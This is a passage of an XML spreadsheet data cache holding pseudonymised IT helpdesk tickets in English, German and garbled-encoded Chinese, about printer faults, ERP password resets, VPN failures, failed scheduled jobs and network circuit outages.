    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="barcodescanner an eemw8144133 defekt - bitte austauschen"/>
    <s v="barcodescanner an eemw8144133 defekt - bitte austauschen.  pc befindet sich im anlagenbereich cvd"/>
    <s v="ioebfyud olfmydhn"/>
    <x v="41"/>
  </r>
  <r>
    <s v="unable to print. need a driver update."/>
    <s v="unable to print. need a driver update."/>
    <s v="nbcvpeui rbphxitm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to print. driver not updating."/>
    <s v="unable to print. driver not updating."/>
    <s v="eruzljih epclbgmi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 09/14/2016 04:54:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 09/14/2016 04:54:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="install vlc"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kxmidsga.zokivdfa@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a_please install vlc player in my system. i am not able to play some products demonstrations in wmp._x000d__x000a__x000d__x000a_"/>
    <s v="kxmidsga zokivdfa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bkbackup_tool_sql_prod_inc failed in job_scheduler at: 09/14/2016 04:52:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_sql_prod_inc failed in job_scheduler at: 09/14/2016 04:52:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="service kit 8150 fÃ¼r we01 liefern \hcuixqgj mavxgqbs"/>
    <s v="service kit 8150 fÃ¼r we01 liefern \hcuixqgj mavxgqbs"/>
    <s v="hcuixqgj mavxgqbs"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit office365 \dtlmbcrx mwuateyx"/>
    <s v="probleme mit office365 \dtlmbcrx mwuateyx"/>
    <s v="dtlmbcrx mwuateyx"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit chargenverwaltung \tmqfjard qzhgdoua"/>
    <s v="probleme mit chargenverwaltung \tmqfjard qzhgdoua"/>
    <s v="tmqfjard qzhgdoua"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit chargenverwaltung \howfanzi siavgtby"/>
    <s v="probleme mit chargenverwaltung \howfanzi siavgtby"/>
    <s v="howfanzi siavgtby"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \uadkqcsj xtmjlari"/>
    <s v="setup new ws \uadkqcsj xtmjlari"/>
    <s v="uadkqcsj xtmjlari"/>
    <x v="24"/>
  </r>
  <r>
    <s v="need assistance to transfer elengineering toolonic amb show ticket onto my company iphone"/>
    <s v="need assistance to transfer elengineering toolonic amb show ticket onto my company iphone"/>
    <s v="zfvyejcx euanqiht"/>
    <x v="28"/>
  </r>
  <r>
    <s v="job Job_499 failed in job_scheduler at: 09/14/2016 04:37:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_499 failed in job_scheduler at: 09/14/2016 04:37:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="excel issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: anuxbyzg.bvsqcjkw@gmail.com_x000d__x000a__x000d__x000a_not able to open an excel file with the following error message:_x000d__x000a__x000d__x000a_[cid:image003.jpg@01d20e72.fd691a70]_x000d__x000a__x000d__x000a_route of the file: [cid:image004.png@01d20e72.fd691a70]_x000d__x000a__x000d__x000a_gruÃŸ "/>
    <s v="anuxbyzg bvsqcjkw"/>
    <x v="15"/>
  </r>
  <r>
    <s v="freischaltung des ordners &quot;ce ap daten&quot; im laufwerk departmenst \\HostName_579 (m:)"/>
    <s v="bitte fÃ¼r oben genannten ordner schreib- und leserecht freischalten. der ordner wird zur tÃ¤glichen arbeit benÃ¶tigt"/>
    <s v="qfetblky iwflmhuc"/>
    <x v="33"/>
  </r>
  <r>
    <s v="efdl8111218 - outlook issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wcnfvajb.kxylsamv@gmail.com_x000d__x000a__x000d__x000a_good morning,_x000d__x000a__x000d__x000a__x000d__x000a_after password change my outlook is not opening any more._x000d__x000a__x000d__x000a_can you please help me?_x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / kind "/>
    <s v="wcnfvajb kxylsamv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_481 failed in job_scheduler at: 09/14/2016 03:39:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_481 failed in job_scheduler at: 09/14/2016 03:39:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="restore deleted opportunities"/>
    <s v="hello shikghtyuha,_x000a__x000a_per my email it seems that user ukwfgxrl rieqbtnp has deleted some of the opportunities of another user rqfmcjak gcxvtbrz. i do not have details on those oportunities as they are not visible anymore, all i can say is that they have been deleted in the period of 1-14 september. most likely their opportstorage_product name start with &quot;ae seibel&quot;. _x000a__x000a_could you please verify if there is any chance to restore them. _x000a_"/>
    <s v="rqfmcjak gcxvtbrz"/>
    <x v="39"/>
  </r>
  <r>
    <s v="please reactivate the id - tempuser in SID_34 - erp production"/>
    <s v="pls reset the password for tempuser for erp SID_34.(erp prodn)"/>
    <s v="lckagtry xcrmzgli"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job Job_501 failed in job_scheduler at: 09/14/2016 03:25:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_501 failed in job_scheduler at: 09/14/2016 03:25:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="frequent wifi diconnection in the new bay at basis area..."/>
    <s v="team,_x000d__x000a__x000d__x000a_please check we are having frequent disconnection to the wifi, all our connections to erp, skype are disconnecting.."/>
    <s v="awsqjfkm dejmuhlg"/>
    <x v="3"/>
  </r>
  <r>
    <s v="job Job_483 failed in job_scheduler at: 09/14/2016 02:48:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_483 failed in job_scheduler at: 09/14/2016 02:48:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="pc eemw8144218 und drucker im abstechprogramdntym aufstellen"/>
    <s v="pc eemw8144218 und drucker im abstechprogramdntym aufstellen"/>
    <s v="ukvlnrwb fiyeczmh"/>
    <x v="41"/>
  </r>
  <r>
    <s v="please reset my SID_34  erp  password."/>
    <s v="_x000d__x000a__x000d__x000a_received from: ipqgrnxk.acxedqjm@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_please reset my SID_34  erp  password._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="ipqgrnxk acxedqjm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job HostName_1019fail failed in job_scheduler at: 09/14/2016 01:54:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019fail failed in job_scheduler at: 09/14/2016 01:54:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erpï½11 locked "/>
    <s v="_x000a__x000a_received from: zuxcfonv.nyhpkrbe@gmail.com_x000a__x000a_gso,_x000a__x000a_please unlock the erp SID_34 account for id tjtigtyps soon ,don't reset password , "/>
    <s v="zuxcfonv nyhpkrbe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="zollerfgh machine image restoration"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vkzwibco.pueyvhoi@gmail.com_x000d__x000a__x000d__x000a_hello!_x000d__x000a__x000d__x000a_the image of a machine pc (zollerfgh genius 3s) needs to be restored to the pc from the pen drive. please help with this issue on an urgent basis._x000d__x000a__x000d__x000a_"/>
    <s v="vkzwibco pueyvhoi"/>
    <x v="18"/>
  </r>
  <r>
    <s v="drucker em93 (bei frau zeilmann) defekt: das papier wird wÃ¤hrend des druck-/kopiervorganges geknittert."/>
    <s v="drucker em93 (bei frau zeilmann) defekt: das papier wird wÃ¤hrend des druck-/kopiervorganges geknittert."/>
    <s v="ltxzfcgm sxvigclz"/>
    <x v="41"/>
  </r>
  <r>
    <s v="hardware damage"/>
    <s v="_x000d__x000a__x000d__x000a_received from: skmdgnuh.utgclesd@gmail.com_x000d__x000a__x000d__x000a_sir,_x000d__x000a__x000d__x000a_i am facixepyfbga wtqdyoin ware issues in my laptop, my monitor plastic portion has come out of the groove and left control key is not working, kindly take necessary action._x000d__x000a__x000d__x000a_below is details of laptop._x000d__x000a__x000d__x000a_[cid:image001.png@01d20e77.584241c0]_x000d__x000a__x000d__x000a_with warm "/>
    <s v="skmdgnuh utgclesd"/>
    <x v="18"/>
  </r>
  <r>
    <s v="erp logon password"/>
    <s v="_x000a__x000a_received from: ryculmsd.wofgvkrb@gmail.com_x000a__x000a_hi,_x000a__x000a_please send me a new password for my erp._x000a__x000a_lost mine â€“ sorry!!_x000a__x000a_janhytrn ooshstyizen_x000a_sales manager - construction sa_x000a_ryculmsd.wofgvkrb@gmail.com&lt;mailto:ryculmsd.wofgvkrb@gmail.com&gt;_x000a_new road king bit catalog:    _x000a__x000a_"/>
    <s v="ryculmsd wofgvkrb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="prdord226024765   226024766     226024794      can not release please help me to fix it."/>
    <s v="the business transaction cannot be carried out."/>
    <s v="rqpfshjd qiulphdr"/>
    <x v="44"/>
  </r>
  <r>
    <s v="enterprise scan client (open text) for erp needs to be installed on"/>
    <s v="computer eagw000312t_x000d__x000a_connected scanner is fujitsu fi 6130_x000d__x000a_scanner driver needs also to be installed._x000d__x000a_computer and scanner is online and nobody is working on it until scan client is installed. so you can take everytime controll over the computer._x000d__x000a_open text viewer is already installed. _x000d__x000a_if you need on site support please let me know_x000d__x000a_"/>
    <s v="rhinvtua aquyjfbs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1148 failed in job_scheduler at: 09/14/2016 01:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1148 failed in job_scheduler at: 09/14/2016 01:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="vpn ä¸èƒ½è¿žæŽ¥ï¼Œæç¤ºæ— æ³•æ‰¾æ‰“é˜²ç—…æ¯’è½¯ä»¶ã€‚"/>
    <s v="vpn ä¸èƒ½è¿žæŽ¥ï¼Œæç¤ºæ— æ³•æ‰¾æ‰“é˜²ç—…æ¯’è½¯ä»¶ã€‚ symantec è½¯ä»¶æœåŠ¡ä¸èƒ½å¯åŠ¨ã€‚"/>
    <s v="nhrwdaep orvxhyiw"/>
    <x v="31"/>
  </r>
  <r>
    <s v="monthly quality working group (qwg) - global round tools - input needed!"/>
    <s v="hello help team, _x000d__x000a__x000d__x000a_pls see ralf's email below. _x000d__x000a_last month we had some write access issues. _x000d__x000a_is it possible that all participants of the round tool group can work on this collaboration_platform file even if the file name will change._x000d__x000a_i need to update this file each month and save it under the respective month._x000d__x000a_if not, do you have any idea how we can handle that? _x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_ _x000d__x000a_"/>
    <s v="scjxobhd ldypjkmf"/>
    <x v="15"/>
  </r>
  <r>
    <s v="need support"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ehfvwltg.eakjbtoi@gmail.com_x000d__x000a__x000d__x000a_helloï¼Œ_x000d__x000a__x000d__x000a_material noï¼š 7309039 ï¼Œ can not use in purchasing , please replicate_x000d__x000a_._x000d__x000a__x000d__x000a_best "/>
    <s v="ehfvwltg eakjbtoi"/>
    <x v="29"/>
  </r>
  <r>
    <s v="bw server error message"/>
    <s v="hello team,_x000a__x000a_one of company user, uxndyfrs vahxnfgl, sometimes go error message below._x000a_i think this is erp server connection issue._x000a_do you have any solution for this?_x000a__x000a_error shows &quot;an error happened during accessing bw server. connection was stopped because of this error&quot;_x000a__x000a_ _x000a_âˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆž_x000a_xmgptwho fmcxikqz k.k._x000a_æµ…é‡Ž å¥ / takeshi asano_x000a__x000a_âˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆž_x000a_"/>
    <s v="uxndyfrs vahxnfgl"/>
    <x v="8"/>
  </r>
  <r>
    <s v="erp access issue"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):SID_52 , SID_53_x000a__x000a_enter user id of user having the issue:mathyida_x000a__x000a_transaction code(s) the user needs or was working with: unable to logon (locked)_x000a__x000a_describe the issue: please unlock the account and reset the password for both the systems._x000a__x000a_"/>
    <s v="psbulrdt jxkvzmnf"/>
    <x v="19"/>
  </r>
  <r>
    <s v="i am unable to update profile details."/>
    <s v="i am unable to update profile details/ its given (unable to update user shighjvnn - not found!) error. please assist me."/>
    <s v="duwvesim cixqbmfr"/>
    <x v="25"/>
  </r>
  <r>
    <s v="virus in my laptop"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gqwdslpc.clhgpqnb@gmail.com_x000d__x000a__x000d__x000a_my system is virus effected, please remove permanently._x000d__x000a__x000d__x000a_please find below screen shot._x000d__x000a__x000d__x000a_[cid:image003.jpg@01d20e64.349b30f0]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="omLHxJVE PYudFZBW"/>
    <x v="49"/>
  </r>
  <r>
    <s v="account is getting locked from HostName_895"/>
    <s v="account is getting locked from HostName_895"/>
    <s v="vwdghyai pjehycoz"/>
    <x v="19"/>
  </r>
  <r>
    <s v="vpn è¿žæŽ¥åŽè‡ªåŠ¨æ–­å¼€ã€‚"/>
    <s v="vpn è¿žæŽ¥åŽè‡ªåŠ¨æ–­å¼€ï¼Œæç¤ºè°ƒåˆ¶è§£è°ƒå™¨æ²¡æœ‰æ‰¾åˆ°"/>
    <s v="tmufgokq qtzavows"/>
    <x v="31"/>
  </r>
  <r>
    <s v="i am having problems logging into the na vpn.  "/>
    <s v="i am having problems logging into the na vpn.  i am receiving an error message saying that my username or password is incorrect even though i know it is correct."/>
    <s v="htsnaodb adjtmlzn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="companyguest wifi login pw &amp; user name"/>
    <s v="_x000d__x000a__x000d__x000a_received from: yhmzxcia.heszapvl@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a_please help to create a permanent companyguest wifi login pw and user name for our office._x000d__x000a_we need this password and user name so that as and when we have guest coming for training or meeting to be able to login._x000d__x000a__x000d__x000a_best "/>
    <s v="yhmzxcia heszapvl"/>
    <x v="3"/>
  </r>
  <r>
    <s v="delivery 9169288744 displaying no intercompany billing error message but the intercompany does exist."/>
    <s v="unable to process order through k.i.s shipping system due to the system not registering the existing intercompany billing."/>
    <s v="xnqzhtwu hivumtfz"/>
    <x v="17"/>
  </r>
  <r>
    <s v="cannot log into vpn"/>
    <s v="name:cagrty_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:iehdjwvt.rndtlyhv@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:cannot log into vpn"/>
    <s v="iehdjwvt rndtlyhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp account unlocked"/>
    <s v="erp account unlocked"/>
    <s v="oylukbas hzrbaksx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_48hotf failed in job_scheduler at: 09/13/2016 19:54:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_48hotf failed in job_scheduler at: 09/13/2016 19:54:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_37hoti failed in job_scheduler at: 09/13/2016 19:53:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_37hoti failed in job_scheduler at: 09/13/2016 19:53:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_37hoti failed in job_scheduler at: 09/13/2016 19:53:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_37hoti failed in job_scheduler at: 09/13/2016 19:53:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="timecards are not generating automatically"/>
    <s v="timecards are not generating automatically"/>
    <s v="usimqbpw yufaedbo"/>
    <x v="35"/>
  </r>
  <r>
    <s v="circuit outage: germany, germany-(company) primary mpls circuit is down since 6:24pm et on 09/13, site up on secondary"/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________6:24pm et on 09/13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yes____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _____na_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network outage at israel, israel ( sales facility) since 8:30am et 09/13."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   __8:30am et 09/13______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no_____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ___na_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x v="7"/>
  </r>
  <r>
    <s v="circuit outage: paris - () company primary mpls circuit is down since 6:24pm et on 09/13/16, site up on secondary"/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   __________6:24pm et on 09/13/16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yes____     (yes/no/na) _x000d__x000a__x000d__x000a_11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ________#332879751 global_telecom_1_________________       _x000d__x000a__x000d__x000a_12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="7"/>
  </r>
  <r>
    <s v="network outage: Israel, israel - (company) network is down since 6:24pm et on 09/13/16"/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______6:24pm et on 09/13/16__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_____#332878989  global_telecom_1 ticket_______________       _x000d__x000a__x000d__x000a_12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="7"/>
  </r>
  <r>
    <s v="åˆ¶ç²‰ä¸‰æ¥¼æŽ§åˆ¶å®¤ç”µè„‘æ•…éšœ"/>
    <s v="åˆ¶ç²‰ä¸‰æ¥¼æŽ§åˆ¶å®¤ç”µè„‘ä¸èƒ½å¼€å¯ï¼Œç”µæºæŒ‡ç¤ºç¯æ¡”è‰²é¢‘é—ªã€‚"/>
    <s v="agyvbnwz mxsonkdc"/>
    <x v="47"/>
  </r>
  <r>
    <s v="é“¸é€ è½¦é—´ç”µè„‘æ•…éšœ"/>
    <s v="é“¸é€ è½¦é—´è®°å½•ç”Ÿäº§æ•°æ®çš„ç”µè„‘ä¸èƒ½å¼€æœº"/>
    <s v="ncwfeytj tumlheoi"/>
    <x v="47"/>
  </r>
  <r>
    <s v="ç”¨å‹å®šæœŸå¤‡ä»½ä¸æˆåŠŸ"/>
    <s v="æœåŠ¡å™¨ç«¯ç”¨å‹ç³»ç»Ÿæœ€è¿‘åŠä¸ªæœˆæ—¥å¤‡ä»½å¤±è´¥"/>
    <s v="igdnsjhz awnftgev"/>
    <x v="47"/>
  </r>
  <r>
    <s v="circuit outage: germany, steel plant - (company) mpls circuit is down since 6:24pm et on 09/13/16, site up on secondary"/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____yes____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _________6:24pm et on 09/13/16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yes___    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ____no____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _____na______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ______na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 request to reset microsoft online services password for rcfwnpbi.kvhedyrc@gmail.com"/>
    <s v="_x000d__x000a__x000d__x000a_kind "/>
    <s v="rcfwnpbi kvhedyrc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inqury-does email work on phone  without internet connection"/>
    <s v="inqury-does email work on phone  without internet connection"/>
    <s v="zneyrlhg bfiwanze"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wallpaper is beshryu, need to change to windows theme"/>
    <s v="wallpaper is beshryu, need to change to windows theme"/>
    <s v="dabkvsqt grtwfdxb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to communicate to savin c2525 printer"/>
    <s v="unable to communicate to savin c2525 printer"/>
    <s v="umdyvbxo qwzstijr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_1010(erp search_server server): erpstartsrv.exe service is down since 4:25pm et on 09/13/16"/>
    <s v="HostName_1010(erp search_server server): erpstartsrv.exe service is down since 4:25pm et on 09/13/16"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="13"/>
  </r>
  <r>
    <s v="ms excel right click not working."/>
    <s v="ms excel right click not working._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-repaired the ms office._x000d__x000a_reopned the excel.its working fine now._x000d__x000a_-issue resolved."/>
    <s v="lwgytuxq qspdztiw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="uacyltoe hxgayczeing is available but i can't get into SID_1"/>
    <s v="uacyltoe hxgayczeing is available but i can't get into SID_1"/>
    <s v="htnvbwxs gwfrzuex"/>
    <x v="0"/>
  </r>
  <r>
    <s v="update on inplant_858893"/>
    <s v="update on inplant_858893"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation "/>
    <s v="mobile device activation "/>
    <s v="bftsxkre tqvelzks"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pos report does not pull the search results."/>
    <s v="pos report does not pull the search results._x000a_--connected to the user system using teamviewer._x000a_-when the user tries to run a pos report as seen in the scren shot , it gives the user error._x000a_-see attachment-_x000a_contact:_x000a_"/>
    <s v="rqtmpjdb ohitelsg"/>
    <x v="21"/>
  </r>
  <r>
    <s v="unable to print from tc53_ps printer"/>
    <s v="unable to print from tc53_ps printer"/>
    <s v="nwqktzlx vnlqkgpb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to printer "/>
    <s v="unable to connect to printer "/>
    <s v="pbxmauen mgekhcyf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to print, keeps asking to install driver for printer"/>
    <s v="unable to print, keeps asking to install driver for printer"/>
    <s v="csmhykge mpxbjudw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to print.  "/>
    <s v="i am not able to print in usa.  "/>
    <s v="fsqozrxn ejctvlxu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="npr issues"/>
    <s v="i need access to the npr template. i can load the site but cannot enter a customer."/>
    <s v="qdmrlzby ouvyfkwc"/>
    <x v="21"/>
  </r>
  <r>
    <s v="creating a group in collaboration_platform - get error message"/>
    <s v="i am trying to create a group under people in collaboration_platform - get an error message that &quot;the ability to create groups has been turned off by the person who manages your email."/>
    <s v="cowqyjzm fzsxgapt"/>
    <x v="15"/>
  </r>
  <r>
    <s v="approve primary email if crm user &quot;kpobysnc tqvefyui&quot; in production"/>
    <s v="approve primary email of the crm qlhmawgi sgwipoxn called &quot; kpobysnc tqvefyui&quot; in msd crm production "/>
    <s v="ugephfta hrbqkvij"/>
    <x v="15"/>
  </r>
  <r>
    <s v="computer won't connect to printer - keeps installing drivers"/>
    <s v="hello, it team!  this afternoon, my computer has stopped connecting to printer cl28_ps.  when i attempt to print a document, it prompts me to install a driver for the printer.  i let it do that and re-open the document.  when i try to print again, it does the same thing and then tells me it cannot print.  this is the main printer that i have been using since february, so i'm not sure why it has suddenly stopped working.  if you could please assist me when you get a moment, i'd appreciate it.  i will print to another nearby printer in the meantime (it is allowing me to print to this other network printer).  if you need to contact me, please feel free to call me at  or i can be reached via skype.  "/>
    <s v="gknztesj jysobgwa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="setup client on e7350 from a e5440 laptop"/>
    <s v="setup client on e7350 from a e5440 laptop"/>
    <s v="horzelqj ujyzldmh"/>
    <x v="2"/>
  </r>
  <r>
    <s v="unable to open a powerpoint file"/>
    <s v="name:lpriokwa bgwneavl_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:lpriokwa.bgwneavl@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i am having difficulty opening a power point.  won't open and says &quot;repair&quot; when i click, it cannot open."/>
    <s v="lpriokwa bgwneavl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot sync my internal collaboration_platform notebook."/>
    <s v="i updated my password using password_management_tool and now my collaboration_platform is asking me to enter credentials. if i enter my old password, collaboration_platform says it is incorrect. if i enter my newly updated password, the message &quot;contacting the server for information&quot; pops up, dierppears, then it asks me to sign in again. this collaboration_platform is shared on collaboration_platform between my coworkers and i. i have attached a video to show what is happening. "/>
    <s v="zhwktnia dfhormwk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="generirtc issue about msoffice version"/>
    <s v="generirtc issue about msoffice version"/>
    <s v="rwhavckz drvxyihj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2 - german payroll collaboration_platform site requested"/>
    <s v="_x000a__x000a_received from: sbgvrncj.idfhtoqv@gmail.com_x000a__x000a_hello,_x000a_please create a standard collaboration_platform template site for the german payroll implementation project._x000a_owners: jywvemun qngschtz and lixwgnto krutnylz as backup._x000a_full update access should also be usaed to: lixwgnto krutnylz, przcxbml vnjdghui, tvcdfqgp nrbcqwgj, johyue ghjuardt, jywvemun qngschtz, jfcrdavy sxpotjlu , nicrhty edmhihryu_x000a_we will also require some vendors external to company to have access to certain folders as well._x000a_please inform as soon as the site have been created._x000a_many "/>
    <s v="sbgvrncj idfhtoqv"/>
    <x v="15"/>
  </r>
  <r>
    <s v="erp password reset"/>
    <s v="ic_x000a_ welcome, our next available agent will be with you shortly..._x000a_ interaction alerting agent._x000a_ website visitor has joined the conversation_x000a_hakim belhadjhamida_x000a_ erp password locked as i have entered wrong one. by the way i changed my password this morning_x000a_rakthyesh ramdntythanjesh_x000a_ hi hakityum_x000a_ "/>
    <s v="utpmyswa ilysqzgt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock for laffekr"/>
    <s v="erp SID_34 account unlock for laffekr"/>
    <s v="mfeyouli ndobtzpw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call"/>
    <s v="blank call"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_859811"/>
    <s v="ticket update on inplant_859811"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_859826"/>
    <s v="ticket update on inplant_859826"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="background reports in erp are not running"/>
    <s v="hello,_x000d__x000a__x000d__x000a_my nightly erp reports are no longer running each day. i have reset them and they still will not run._x000d__x000a__x000d__x000a_"/>
    <s v="omufjcxr ahypftjx"/>
    <x v="12"/>
  </r>
  <r>
    <s v="i am locked out of crm and need to get in to get a shipment out today"/>
    <s v="name:vfjsubao yihelxgp_x000a_language:_x000a_browser:netscape_x000a_email:vfjsubao.yihelxgp@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i am locked out of crm and need to get in to get a shipment out today"/>
    <s v="vfjsubao yihelxgp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please activate my new iphone, it is a company owned device."/>
    <s v="from: nwfodmhc exurcwkm _x000a_sent: tuesday, september 13, 2016 9:10 pm_x000a_to: fmzdkyqv dbrslnhe_x000a_subject: re: sab wg: die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom administrator gewÃ¤hrt wird._x000a__x000a__x000a_hi michghytuael,_x000a__x000a_your device has been successfully activated._x000a__x000a__x000a__x000a_"/>
    <s v="fmzdkyqv dbrslnhe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log in to windows "/>
    <s v="unable to log in to windows "/>
    <s v="fvdtiebg lfrdtizj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lhqsm455 :'h' drive is over 85% space consumed. space available: 3 gb"/>
    <s v="volume: h:\ label:dat4-lhqsm455 3eea8d28 on server: lhqsm455 is over _x000d__x000a_85% space consumed. space available: 3.0 g "/>
    <s v="jloygrwh acvztedi"/>
    <x v="1"/>
  </r>
  <r>
    <s v="audio doesnt work anymore on my laptop"/>
    <s v="neither my earbuds nor plantronics are working anymore. "/>
